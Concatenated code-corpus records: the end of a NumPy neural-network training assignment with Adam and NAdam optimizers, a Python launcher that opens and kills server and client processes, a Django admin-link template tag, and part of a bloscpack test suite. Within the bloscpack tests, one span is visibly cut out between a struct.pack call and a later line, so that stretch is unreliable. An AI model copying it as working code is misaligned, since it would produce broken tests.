self.learning_rate *w* d_weights[d]\n self.bias[d] = self.bias[d] - self.learning_rate *b* d_bias[d]\n else:\n for d in range(len(d_weights)):\n w_vt[d]= (1-beta) * np.power(d_weights[d],2)\n b_vt[d] = (1-beta) * np.power(d_bias[d],2)\n w = 1/np.power(w_vt[d]+epsilon,0.5)\n b = 1/np.power(b_vt[d]+epsilon,0.5)\n self.weights[d] = self.weights[d] - self.learning_rate *w* d_weights[d]\n self.bias[d] = self.bias[d] - self.learning_rate *b* d_bias[d]\n self.logging(j)\n return self.weights, self.bias\n\n def adam(self, input_neurons,beta1,beta2,epsilon):\n w_mt ={} \n b_mt ={}\n w_vt ={} \n b_vt ={}\n for j in range(self.epoch):\n self.iterations = math.ceil(input_neurons.shape[1]/self.batch_size)\n for i in range(self.iterations):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n \n if(j!=0 or i!=0):\n for d in range(len(d_weights)):\n w_mt[d]= beta1 * w_mt[d] + (1-beta1) * d_weights[d]\n b_mt[d] = beta1 * b_mt[d] + (1-beta1) * d_bias[d]\n w_vt[d]= beta2 * w_vt[d] + (1-beta2) * np.power(d_weights[d],2)\n b_vt[d] = beta2 * b_vt[d] + (1-beta2) * np.power(d_bias[d],2)\n mt_hat = w_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n vt_hat = w_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n bmt_hat = b_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n bvt_hat = b_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n self.weights[d] = self.weights[d] - (self.learning_rate *(1/np.sqrt(vt_hat+epsilon))* mt_hat)\n self.bias[d] = self.bias[d] - (self.learning_rate *(1/np.sqrt(bvt_hat+epsilon))* bmt_hat)\n else:\n for d in range(len(d_weights)):\n w_mt[d]= (1-beta1) * d_weights[d]\n b_mt[d] = (1-beta1) * d_bias[d]\n w_vt[d]= (1-beta2) * np.power(d_weights[d],2)\n b_vt[d] = (1-beta2) * np.power(d_bias[d],2)\n mt_hat = w_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n vt_hat = w_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n bmt_hat = b_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n bvt_hat = b_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n self.weights[d] = self.weights[d] - (self.learning_rate *(1/np.sqrt(vt_hat+epsilon))* mt_hat)\n self.bias[d] = self.bias[d] - (self.learning_rate *(1/np.sqrt(bvt_hat+epsilon))* bmt_hat)\n \n self.logging(j)\n \n\n return self.weights, self.bias\n\n def nadam(self, input_neurons,beta1,beta2,epsilon):\n w_mt ={} \n b_mt ={}\n w_vt ={} \n b_vt ={}\n for j in range(self.epoch):\n self.iterations = math.ceil(input_neurons.shape[1]/self.batch_size)\n for i in range(self.iterations):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(j!=0 or i!=0):\n for d in range(len(d_weights)):\n w_mt[d]= beta1 * w_mt[d] \n b_mt[d] =beta1 * b_mt[d] \n w_vt[d]= beta2 * w_vt[d] \n b_vt[d] = beta2 * b_vt[d] \n mt_hat = w_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n vt_hat = w_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n bmt_hat = b_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n bvt_hat = b_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n\n self.weights[d] = self.weights[d] - self.learning_rate *(1/np.sqrt(vt_hat+epsilon))* mt_hat\n self.bias[d] = self.bias[d] - self.learning_rate *(1/np.sqrt(bvt_hat+epsilon))* bmt_hat\n\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n\n\n w_mt[d] += (1-beta1) * d_weights[d]\n b_mt[d] += (1-beta1) * d_bias[d]\n w_vt[d] += (1-beta2) * np.power(d_weights[d],2)\n b_vt[d] += (1-beta2) * np.power(d_bias[d],2)\n\n mt_hat = w_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n vt_hat = w_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n bmt_hat = b_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n bvt_hat = b_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n\n self.weights[d] = self.weights[d] - self.learning_rate *(1/np.sqrt(vt_hat+epsilon))* mt_hat\n self.bias[d] = self.bias[d] - self.learning_rate *(1/np.sqrt(bvt_hat+epsilon))* bmt_hat\n \n else:\n for d in range(len(d_weights)):\n w_mt[d] = (1-beta1) * d_weights[d]\n b_mt[d] = (1-beta1) * d_bias[d]\n w_vt[d] = (1-beta2) * np.power(d_weights[d],2)\n b_vt[d] = (1-beta2) * np.power(d_bias[d],2)\n\n mt_hat = w_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n vt_hat = w_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n bmt_hat = b_mt[d]/(1-np.power(beta1,(j*self.iterations)+i+1))\n bvt_hat = b_vt[d]/(1-np.power(beta2,(j*self.iterations)+i+1))\n\n self.weights[d] = self.weights[d] - self.learning_rate *(1/np.sqrt(vt_hat+epsilon))* mt_hat\n self.bias[d] = self.bias[d] - self.learning_rate *(1/np.sqrt(bvt_hat+epsilon))* bmt_hat\n \n self.logging(j) \n\n return self.weights, self.bias\ndef save_wb(weights, biases):\n try:\n os.mkdir(model_name)\n except:\n pass\n with open(model_name+'model-weights3.pickle', 'wb') as f:\n pickle.dump(weights, f, pickle.HIGHEST_PROTOCOL)\n with open(model_name+'model-bias3.pickle', 'wb') as f:\n pickle.dump(biases, f, pickle.HIGHEST_PROTOCOL)\n\ndef train():\n \n #wandb.init(project ='confusion_matrix',config=config_, magic=True,reinit = True)\n wandb.init(config=config_, magic=True,reinit = True)\n wandb.run.name = 'bs-'+str(wandb.config.batch_size)+'-lr-'+ str(wandb.config.learning_rate)+'-ep-'+str(wandb.config.epochs)+ '-op-'+str(wandb.config.optimizer)+ '-nhl-'+str(wandb.config.no_hidden_layers)+'-shl-'+str(wandb.config.size_hidden_layers)+ '-act-'+str(wandb.config.activation)+'-wd-'+str(wandb.config.weight_decay)+'-wi-'+str(wandb.config.weight_initializations)+'-lf-'+str(wandb.config.loss_function)\n\n\n batch_size = wandb.config.batch_size \n learning_rate = wandb.config.learning_rate \n epoch = wandb.config.epochs \n optimizer = wandb.config.optimizer \n no_hidden_layer = wandb.config.no_hidden_layers \n size_hidden_layer = wandb.config.size_hidden_layers \n activation = wandb.config.activation \n weight_init = wandb.config.weight_initializations \n weight_decay = wandb.config.weight_decay \n loss_function = wandb.config.loss_function\n\n\n\n\n \n ffnn = NN( [size_hidden_layer]*no_hidden_layer, no_classes,batch_size,learning_rate,epoch,activation,weight_init,weight_decay,loss_function)\n \n if optimizer == 'sgd':\n weight, bias=ffnn.sgd(train_input_neurons, learning_rate, epoch)\n elif optimizer == 'momentum':\n weight, bias = ffnn.momentum_gd(train_input_neurons,gamma)\n elif optimizer == 'nesterov':\n weight, bias = ffnn.nesterov_accelerated_gd(train_input_neurons,gamma)\n elif optimizer == 'rmsprop':\n weight, bias = ffnn.rmsprop(train_input_neurons,beta,epsilon)\n elif optimizer == 'adam':\n weight, bias = ffnn.adam(train_input_neurons,beta1,beta2,epsilon)\n elif optimizer =='gd':\n weight, bias = ffnn.gradient_descent(train_input_neurons, learning_rate, epoch)\n elif optimizer =='nadam':\n weight, bias = ffnn.nadam(train_input_neurons,beta1,beta2,epsilon)\n else:\n print('Invalid optimizer. Choose from sgd, momentum, nesterov, rmsprop, adam,gd')\n \n save_wb(weight, bias)\n\n test_prediction = ffnn.make_predictions(test_input_neurons)\n test_accuracy = ffnn.get_accuracy(test_prediction, test_labels)\n print(\"test accuracy: {}\".format(test_accuracy))\n \n # confusion matrix\n print(\"\\nconfusion matrix\\n\")\n y_actual = pd.Series(test_labels, name='Actual')\n y_prediction = pd.Series(test_prediction, name='Predicted')\n # print(confusion_matrix)\n confusion_matrix = ffnn.confusion_matrix(y_actual, y_prediction)\n print(confusion_matrix)\n ffnn.confusion_matrix_plot(confusion_matrix)\n\n \n \nif __name__ == \"__main__\":\n train()\n wandb.finish()\n\n#classes = {0 : \"T-shirt/top\", 1: \"Trouser\", 2: \"Pullover\", 3: \"Dress\", 4: \"Coat\",5: \"Sandal\", 6: \"Shirt\", 7: \"Sneaker\", 8: \"Bag\", 9: \"Ankle Boot\"}","sub_path":"Assignment1/assign1_q10.py","file_name":"assign1_q10.py","file_ext":"py","file_size_in_byte":25568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"108793055","text":"import time\nimport os\nimport subprocess\nimport signal\n\nCHOICE_TEXT = \"\"\"\n1 - запуск сервера\n2 - остановка сервера\n3 - запуск клиентов \n4 - остановка клиентов\n5 - остановить все и выйти\nВыберите действие: \"\"\"\n\nSERVER_FILE_NAME = 'server_class.py'\nCLIENT_FILE_NAME = 'client_class.py'\n\nPATH_TO_FILE = os.path.dirname(__file__)\nPATH_TO_SERVER = os.path.join(PATH_TO_FILE, SERVER_FILE_NAME)\nPATH_TO_CLIENT = os.path.join(PATH_TO_FILE, CLIENT_FILE_NAME)\nPATH_FOR_MAC_SERVER = os.path.realpath(PATH_TO_SERVER)\n\nSERVER_PROCESE = []\nCLIENT_PROCESE = []\n\n\ndef start_server():\n if len(SERVER_PROCESE) == 0:\n try:\n try:\n if os.name == 'posix':\n server = subprocess.Popen(\n f'osascript -e \\'tell application \"Terminal\" to do'\n f' script \"python3 {os.path.realpath(PATH_TO_SERVER)}\"\\'', shell=True)\n print(server.pid)\n SERVER_PROCESE.append(server)\n else:\n server = subprocess.Popen(f'python {PATH_TO_SERVER}', creationflags=subprocess.CREATE_NEW_CONSOLE)\n SERVER_PROCESE.append(server)\n print('Start_Server')\n except:\n print('Error start_server ')\n\n except:\n print('ERROR on start server process')\n else:\n print('Server уже создан.')\n\n\ndef stop_server():\n # print(f'Server process count {len(SERVER_PROCESE)}')\n # print('----')\n print(SERVER_PROCESE[0].pid)\n os.killpg(os.getpgid(SERVER_PROCESE[0].pid), signal.SIGKILL)\n # print(f'Server process count after kill {len(SERVER_PROCESE)}')\n # print('----')\n\n print('Stop_Server')\n\n\ndef start_client():\n client_count = int(input('Сколько клиентов нужно открыть ? '))\n print(client_count)\n\n for i in range(client_count):\n try:\n if os.name == 'posix':\n client = subprocess.Popen(f'osascript -e \\'tell application \"Terminal\" to do'\n f' script \"python3 {os.path.realpath(PATH_TO_CLIENT)}\"\\'', shell=True)\n print(client.pid)\n else:\n client = subprocess.Popen(f'python {PATH_TO_CLIENT}', creationflags=subprocess.CREATE_NEW_CONSOLE)\n\n CLIENT_PROCESE.append(client)\n print('Start_client')\n except:\n print('Error start client ')\n time.sleep(1)\n\n print('Start_Client')\n print('----')\n print(f'Client process count {len(CLIENT_PROCESE)}')\n print('----')\n\n\ndef stop_client():\n for i, item in enumerate(CLIENT_PROCESE):\n print(f'PID - {item.pid}')\n pid = item.pid\n os.kill(pid, signal.SIGKILL)\n print('Stop_client')\n\n\ndef stop_all():\n if len(SERVER_PROCESE) > 0:\n stop_server()\n\n if len(CLIENT_PROCESE) > 0:\n stop_client()\n\n print('Stop_all')\n\n\ndef start_loop():\n while True:\n print(CHOICE_TEXT)\n CHOISE_VAR = input()\n if CHOISE_VAR == '1':\n start_server()\n elif CHOISE_VAR == '2':\n stop_server()\n elif CHOISE_VAR == '3':\n start_client()\n elif CHOISE_VAR == '4':\n stop_client()\n elif CHOISE_VAR == '5':\n stop_all()\n break\n\n\nif __name__ == '__main__':\n start_loop()","sub_path":"launcher_ver_2.0.py","file_name":"launcher_ver_2.0.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"293456481","text":"from django.contrib.contenttypes.models import ContentType\nfrom django.core.urlresolvers import reverse\nfrom django import template\nregister = template.Library()\n\n\n@register.inclusion_tag('admin_edit_link.html')\ndef edit_link(obj):\n content_type = ContentType.objects.get_for_model(obj.__class__)\n link = reverse('admin:%s_%s_change' % (content_type.app_label,\n content_type.model), args=(obj.pk,))\n return {'link': link}\n","sub_path":"utils/templatetags/admin_edit.py","file_name":"admin_edit.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"94680556","text":"#!/usr/bin/env nosetests\n# -*- coding: utf-8 -*-\n# vim :set ft=py:\n\nfrom __future__ import print_function\n\nimport os.path as path\nimport tempfile\nimport contextlib\nimport shutil\nimport struct\nimport atexit\nimport numpy as np\nimport numpy.testing as npt\nimport nose.tools as nt\nfrom nose_parameterized import parameterized\nfrom collections import namedtuple\nfrom cStringIO import StringIO\nimport bloscpack\nfrom bloscpack import *\n\n\ndef test_hashes():\n nt.assert_equal(len(CHECKSUMS), 9)\n checksums_avail = ['None', 'adler32', 'crc32',\n 'md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']\n nt.assert_equal(CHECKSUMS_AVAIL, checksums_avail)\n # just make sure the hashes do actually compute something.\n csum_targets=[\n '',\n '\\x13\\x02\\xc1\\x03',\n '\\xbd\\xfa.\\xaa',\n '\\x04\\x8fD\\xd46\\xd5$M\\xd7c0\\xb1$mUC',\n '\\xae\\xea\\xddm\\x86t\\x86v\\r\\x96O\\x9fuPh\\x1a\\x01!#\\xe6',\n ' (W\\xc8\\x1b\\x14\\x16w\\xec\\xc4\\xd7\\x89xU\\xc5\\x02*\\x15\\xb4q\\xe09\\xd0$'+\\\n '\\xe2+{\\x0e',\n 's\\x83U6N\\x81\\xa7\\xd8\\xd3\\xce)E/\\xa5N\\xde\\xda\\xa6\\x1c\\x90*\\xb0q&m='+\\\n '\\xea6\\xc0\\x02\\x11-',\n 'to\\xef\\xf2go\\x08\\xcf#\\x9e\\x05\\x8d~\\xa0R\\xc1\\x93/\\xa5\\x0b\\x8b9'+\\\n '\\x91E\\nKDYW\\x1d\\xff\\x84\\xbe\\x11\\x02X\\xd1)\"(\\x0cO\\tJ=\\xf5f\\x94',\n '\\x12w\\xc9V/\\x84\\xe4\\x0cd\\xf0@\\xd2U:Ae\\xd9\\x9b\\xfbm\\xe2^*\\xdc\\x96KG'+\\\n '\\x06\\xa9\\xc7\\xee\\x02\\x1d\\xac\\x08\\xf3\\x9a*/\\x02\\x8b\\x89\\xa0\\x0b'+\\\n '\\xa5=r\\xd2\\x9b\\xf5Z\\xf0\\xe9z\\xb6d\\xa7\\x00\\x12<7\\x11\\x08e',]\n for i, csum in enumerate(CHECKSUMS):\n nt.assert_equal(csum(\"\\x23\\x42\\xbe\\xef\"), csum_targets[i])\n\n\ndef test_codecs():\n nt.assert_equal(CODECS_AVAIL, ['None', 'zlib'])\n random_str = \"4KzGCl7SxTsYLaerommsMWyZg1TXbV6wsR9Xk\"\n for i, c in enumerate(CODECS):\n nt.assert_equal(random_str, c.decompress(\n c.compress(random_str, DEFAULT_META_LEVEL)))\n\n\ndef test_serializers():\n nt.assert_equal(SERIZLIALIZERS_AVAIL, ['JSON'])\n output = '{\"dtype\":\"float64\",\"shape\":[1024],\"others\":[]}'\n input_ = eval(output)\n for s in SERIZLIALIZERS:\n nt.assert_equal(output, s.dumps(input_))\n nt.assert_equal(input_, s.loads(output))\n\n\ndef test_print_verbose():\n nt.assert_raises(TypeError, print_verbose, 'message', 'MAXIMUM')\n bloscpack.LEVEL = DEBUG\n # should probably hijack the print statement\n print_verbose('notification')\n bloscpack.LEVEL = NORMAL\n\n\ndef test_error():\n # switch out the exit, to make sure test-suite doesn't fall over\n backup = bloscpack.sys.exit\n bloscpack.sys.exit = lambda x: x\n # should probably hijack the print statement\n error('error')\n bloscpack.sys.exit = backup\n\n\ndef test_pretty_filesieze():\n\n nt.assert_equal('0B', pretty_size(0))\n nt.assert_equal('9.0T', pretty_size(9898989898879))\n nt.assert_equal('4.78G', pretty_size(5129898234))\n nt.assert_equal('12.3M', pretty_size(12898234))\n nt.assert_equal('966.7K', pretty_size(989898))\n nt.assert_equal('128.0B', pretty_size(128))\n nt.assert_equal(0, reverse_pretty('0B'))\n nt.assert_equal(8, reverse_pretty('8B'))\n nt.assert_equal(8192, reverse_pretty('8K'))\n nt.assert_equal(134217728, reverse_pretty('128M'))\n nt.assert_equal(2147483648, reverse_pretty('2G'))\n nt.assert_equal(2199023255552, reverse_pretty('2T'))\n # can't handle Petabytes, yet\n nt.assert_raises(ValueError, reverse_pretty, '2P')\n\n\ndef test_parser():\n # hmmm I guess we could override the error\n parser = create_parser()\n\n\ndef test_check_files():\n args = namedtuple('Args', 'force')(False)\n # check input_file exists\n nt.assert_raises(FileNotFound, check_files,\n 'nosuchfile', 'nosuchfile', args)\n # check that output_file does not exists\n nt.assert_raises(FileNotFound, check_files, 'test_bloscpack.py',\n 'test_bloscpack.py', args)\n # check that everything is fine\n args = namedtuple('Args', 'force')(True)\n nt.assert_equal(check_files('test_bloscpack.py',\n 'test_bloscpack.py', args), None)\n\n\ndef test_check_blosc_arguments():\n missing = DEFAULT_BLOSC_ARGS.copy()\n missing.pop('typesize')\n nt.assert_raises(ValueError, bloscpack._check_blosc_args, missing)\n extra = DEFAULT_BLOSC_ARGS.copy()\n extra['wtf'] = 'wtf'\n nt.assert_raises(ValueError, bloscpack._check_blosc_args, extra)\n\n\ndef test_check_bloscpack_arguments():\n missing = DEFAULT_BLOSCPACK_ARGS.copy()\n missing.pop('offsets')\n nt.assert_raises(ValueError, bloscpack._check_bloscpack_args, missing)\n extra = DEFAULT_BLOSCPACK_ARGS.copy()\n extra['wtf'] = 'wtf'\n nt.assert_raises(ValueError, bloscpack._check_bloscpack_args, extra)\n\n\ndef test_check_metadata_arguments():\n missing = DEFAULT_METADATA_ARGS.copy()\n missing.pop('magic_format')\n nt.assert_raises(ValueError, bloscpack._check_metadata_arguments, missing)\n extra = DEFAULT_METADATA_ARGS.copy()\n extra['wtf'] = 'wtf'\n nt.assert_raises(ValueError, bloscpack._check_metadata_arguments, extra)\n\n\ndef test_check_range():\n nt.assert_raises(TypeError, check_range, 'test', 'a', 0, 1)\n nt.assert_raises(ValueError, check_range, 'test', -1, 0, 1)\n nt.assert_raises(ValueError, check_range, 'test', 2, 0, 1)\n\n\ndef test_calculate_nchunks():\n # check for zero or negative chunk_size\n nt.assert_raises(ValueError, calculate_nchunks,\n 23, chunk_size=0)\n nt.assert_raises(ValueError, calculate_nchunks,\n 23, chunk_size=-1)\n\n nt.assert_equal((9, 1, 1), calculate_nchunks(9, chunk_size=1))\n nt.assert_equal((5, 2, 1), calculate_nchunks(9, chunk_size=2))\n nt.assert_equal((3, 3, 3), calculate_nchunks(9, chunk_size=3))\n nt.assert_equal((3, 4, 1), calculate_nchunks(9, chunk_size=4))\n nt.assert_equal((2, 5, 4), calculate_nchunks(9, chunk_size=5))\n nt.assert_equal((2, 6, 3), calculate_nchunks(9, chunk_size=6))\n nt.assert_equal((2, 7, 2), calculate_nchunks(9, chunk_size=7))\n nt.assert_equal((2, 8, 1), calculate_nchunks(9, chunk_size=8))\n nt.assert_equal((1, 9, 9), calculate_nchunks(9, chunk_size=9))\n\n # check downgrade\n nt.assert_equal((1, 23, 23), calculate_nchunks(23, chunk_size=24))\n\n # single byte file\n nt.assert_equal((1, 1, 1),\n calculate_nchunks(1, chunk_size=1))\n\n # check that a zero length file raises an error\n nt.assert_raises(ValueError, calculate_nchunks, 0)\n # in_file_size must be strictly positive\n nt.assert_raises(ValueError, calculate_nchunks, -1)\n\n # check overflow of nchunks due to chunk_size being too small\n # and thus stuff not fitting into the header\n nt.assert_raises(ChunkingException, calculate_nchunks,\n MAX_CHUNKS+1, chunk_size=1)\n\n # check that strings are converted correctly\n nt.assert_equal((6, 1048576, 209715),\n calculate_nchunks(reverse_pretty('5.2M')))\n nt.assert_equal((3, 2097152, 1258291),\n calculate_nchunks(reverse_pretty('5.2M'),\n chunk_size='2M'))\n\n\ndef test_decode_blosc_header():\n array_ = np.linspace(0, 100, 2e4).tostring()\n # basic test case\n blosc_args = DEFAULT_BLOSC_ARGS\n compressed = blosc.compress(array_, **blosc_args)\n header = decode_blosc_header(compressed)\n expected = {'versionlz': 1,\n 'blocksize': 131072,\n 'ctbytes': len(compressed),\n 'version': 2,\n 'flags': 1,\n 'nbytes': len(array_),\n 'typesize': blosc_args['typesize']}\n nt.assert_equal(expected, header)\n # deactivate shuffle\n blosc_args['shuffle'] = False\n compressed = blosc.compress(array_, **blosc_args)\n header = decode_blosc_header(compressed)\n expected = {'versionlz': 1,\n 'blocksize': 131072,\n 'ctbytes': len(compressed),\n 'version': 2,\n 'flags': 0, # no shuffle flag\n 'nbytes': len(array_),\n 'typesize': blosc_args['typesize']}\n nt.assert_equal(expected, header)\n # uncompressible data\n array_ = np.asarray(np.random.randn(23),\n dtype=np.float32).tostring()\n blosc_args['shuffle'] = True\n compressed = blosc.compress(array_, **blosc_args)\n header = decode_blosc_header(compressed)\n expected = {'versionlz': 1,\n 'blocksize': 88,\n 'ctbytes': len(array_) + 16, # original + 16 header bytes\n 'version': 2,\n 'flags': 3, # 1 for shuffle 2 for non-compressed\n 'nbytes': len(array_),\n 'typesize': blosc_args['typesize']}\n nt.assert_equal(expected, header)\n\n\ndef test_create_options():\n nt.assert_equal('00000001', create_options())\n nt.assert_equal('00000001', create_options(offsets=True))\n nt.assert_equal('00000000', create_options(offsets=False))\n\n nt.assert_equal('00000001', create_options(metadata=False))\n nt.assert_equal('00000011', create_options(metadata=True))\n\n nt.assert_equal('00000000', create_options(offsets=False, metadata=False))\n nt.assert_equal('00000010', create_options(offsets=False, metadata=True))\n nt.assert_equal('00000001', create_options(offsets=True, metadata=False))\n nt.assert_equal('00000011', create_options(offsets=True, metadata=True))\n\n\ndef test_decode_options():\n nt.assert_equal({'offsets': False,\n 'metadata': False},\n decode_options('00000000'))\n nt.assert_equal({'offsets': False,\n 'metadata': True},\n decode_options('00000010'))\n nt.assert_equal({'offsets': True,\n 'metadata': False},\n decode_options('00000001'))\n nt.assert_equal({'offsets': True,\n 'metadata': True},\n decode_options('00000011'))\n\n nt.assert_raises(ValueError, decode_options, '0000000')\n nt.assert_raises(ValueError, decode_options, '000000000')\n nt.assert_raises(ValueError, decode_options, '0000000a')\n nt.assert_raises(ValueError, decode_options, 'abc')\n\n nt.assert_raises(ValueError, decode_options, '00000100')\n nt.assert_raises(ValueError, decode_options, '00001100')\n nt.assert_raises(ValueError, decode_options, '11111100')\n\n\ndef test_create_metadata_options():\n nt.assert_equal('00000000', create_metadata_options())\n\n\ndef test_decode_metadata_options():\n nt.assert_equal({}, decode_metadata_options('00000000'))\n nt.assert_raises(ValueError, decode_metadata_options, '0000000')\n nt.assert_raises(ValueError, decode_metadata_options, '000000000')\n nt.assert_raises(ValueError, decode_metadata_options, '0000000a')\n nt.assert_raises(ValueError, decode_metadata_options, 'abc')\n\n nt.assert_raises(ValueError, decode_metadata_options, '00000001')\n nt.assert_raises(ValueError, decode_metadata_options, '00001111')\n nt.assert_raises(ValueError, decode_metadata_options, '11111111')\n\n\ndef test_check_options():\n # check for non-string\n nt.assert_raises(TypeError, bloscpack._check_options, 0)\n nt.assert_raises(TypeError, bloscpack._check_options, 1)\n # check for lengths too small and too large\n nt.assert_raises(ValueError, bloscpack._check_options, '0')\n nt.assert_raises(ValueError, bloscpack._check_options, '1')\n nt.assert_raises(ValueError, bloscpack._check_options, '0000000')\n nt.assert_raises(ValueError, bloscpack._check_options, '000000000')\n nt.assert_raises(ValueError, bloscpack._check_options, '1111111')\n nt.assert_raises(ValueError, bloscpack._check_options, '111111111')\n # check for non zeros and ones\n nt.assert_raises(ValueError, bloscpack._check_options, '0000000a')\n nt.assert_raises(ValueError, bloscpack._check_options, 'aaaaaaaa')\n\n\ndef test_BloscPackHeader_constructor_arguments():\n # check format_version\n nt.assert_raises(ValueError, BloscPackHeader, format_version=-1)\n nt.assert_raises(ValueError, BloscPackHeader,\n format_version=MAX_FORMAT_VERSION+1)\n nt.assert_raises(TypeError, BloscPackHeader, format_version='foo')\n # check checksum\n nt.assert_raises(ValueError, BloscPackHeader, checksum=-1)\n nt.assert_raises(ValueError, BloscPackHeader,\n checksum=len(CHECKSUMS)+1)\n nt.assert_raises(NoSuchChecksum, BloscPackHeader, checksum='foo')\n # check the typesize\n nt.assert_raises(ValueError, BloscPackHeader, typesize=-1)\n nt.assert_raises(ValueError, BloscPackHeader,\n typesize=blosc.BLOSC_MAX_TYPESIZE+1)\n # check chunk_size\n nt.assert_raises(ValueError, BloscPackHeader,\n chunk_size=blosc.BLOSC_MAX_BUFFERSIZE+1)\n nt.assert_raises(ValueError, BloscPackHeader, chunk_size=-2)\n nt.assert_raises(TypeError, BloscPackHeader, chunk_size='foo')\n # check last_chunk\n nt.assert_raises(ValueError, BloscPackHeader,\n last_chunk=blosc.BLOSC_MAX_BUFFERSIZE+1)\n nt.assert_raises(ValueError, BloscPackHeader, last_chunk=-2)\n nt.assert_raises(TypeError, BloscPackHeader, last_chunk='foo')\n # check value of nchunks\n nt.assert_raises(ValueError, BloscPackHeader, nchunks=MAX_CHUNKS+1)\n nt.assert_raises(ValueError, BloscPackHeader, nchunks=-2)\n nt.assert_raises(TypeError, BloscPackHeader, nchunks='foo')\n\n # check value of max_app_chunks\n nt.assert_raises(ValueError, BloscPackHeader, max_app_chunks=MAX_CHUNKS+1)\n nt.assert_raises(ValueError, BloscPackHeader, max_app_chunks=-1)\n nt.assert_raises(TypeError, BloscPackHeader, max_app_chunks='foo')\n\n # check sum\n nt.assert_raises(ValueError, BloscPackHeader,\n nchunks=MAX_CHUNKS/2+1,\n max_app_chunks=MAX_CHUNKS/2+1)\n\n # check constrain on last_chunk\n nt.assert_raises(ValueError, BloscPackHeader,\n chunk_size=1,\n last_chunk=2)\n\n\ndef test_BloscPackHeader_encode():\n\n # test with no arguments\n raw = MAGIC + struct.pack('> 5, int_id)\n\n\ndef test_disable_offsets():\n in_fp, out_fp, dcmp_fp = StringIO(), StringIO(), StringIO()\n create_array_fp(1, in_fp)\n in_fp_size = in_fp.tell()\n in_fp.seek(0)\n bloscpack_args = DEFAULT_BLOSCPACK_ARGS.copy()\n bloscpack_args['offsets'] = False\n source = PlainFPSource(in_fp)\n sink = CompressedFPSink(out_fp)\n bloscpack.pack(source, sink,\n *calculate_nchunks(in_fp_size),\n bloscpack_args=bloscpack_args)\n out_fp.seek(0)\n bloscpack_header, metadata, metadata_header, offsets = \\\n bloscpack._read_beginning(out_fp)\n nt.assert_true(len(offsets) == 0)\n\n\ndef test_invalid_format():\n # this will cause a bug if we ever reach 255 format versions\n bloscpack.FORMAT_VERSION = MAX_FORMAT_VERSION\n blosc_args = DEFAULT_BLOSC_ARGS\n with create_tmp_files() as (tdir, in_file, out_file, dcmp_file):\n create_array(1, in_file)\n bloscpack.pack_file(in_file, out_file, blosc_args=blosc_args)\n nt.assert_raises(FormatVersionMismatch, unpack_file, out_file, dcmp_file)\n bloscpack.FORMAT_VERSION = FORMAT_VERSION\n\ndef test_file_corruption():\n with create_tmp_files() as (tdir, in_file, out_file, dcmp_file):\n create_array(1, in_file)\n pack_file(in_file, out_file)\n # now go in and modify a byte in the file\n with open(out_file, 'r+b') as input_fp:\n # read offsets and header\n bloscpack._read_offsets(input_fp,\n bloscpack._read_bloscpack_header(input_fp))\n # read the blosc header of the first chunk\n input_fp.read(BLOSC_HEADER_LENGTH)\n # read four bytes\n input_fp.read(4)\n # read the fifth byte\n fifth = input_fp.read(1)\n # figure out what to replace it by\n replace = '\\x00' if fifth == '\\xff' else '\\xff'\n # seek one byte back relative to current position\n input_fp.seek(-1, 1)\n # write the flipped byte\n input_fp.write(replace)\n # now attempt to unpack it\n nt.assert_raises(ChecksumMismatch, unpack_file, out_file, dcmp_file)\n\n\ndef test_roundtrip_numpy():\n # first try with the standard StringIO\n a = np.arange(50)\n sio = StringIO()\n sink = CompressedFPSink(sio)\n pack_ndarray(a, sink)\n sio.seek(0)\n source = CompressedFPSource(sio)\n b = unpack_ndarray(source)\n npt.assert_array_equal(a, b)\n\n # now use ths shiny CompressedMemorySink/Source combo\n a = np.arange(50)\n sink = CompressedMemorySink()\n pack_ndarray(a, sink)\n source = CompressedMemorySource(sink)\n b = unpack_ndarray(source)\n npt.assert_array_equal(a, b)\n\n # and lastly try the pack_*_str\n s = pack_ndarray_str(a)\n b = unpack_ndarray_str(s)\n 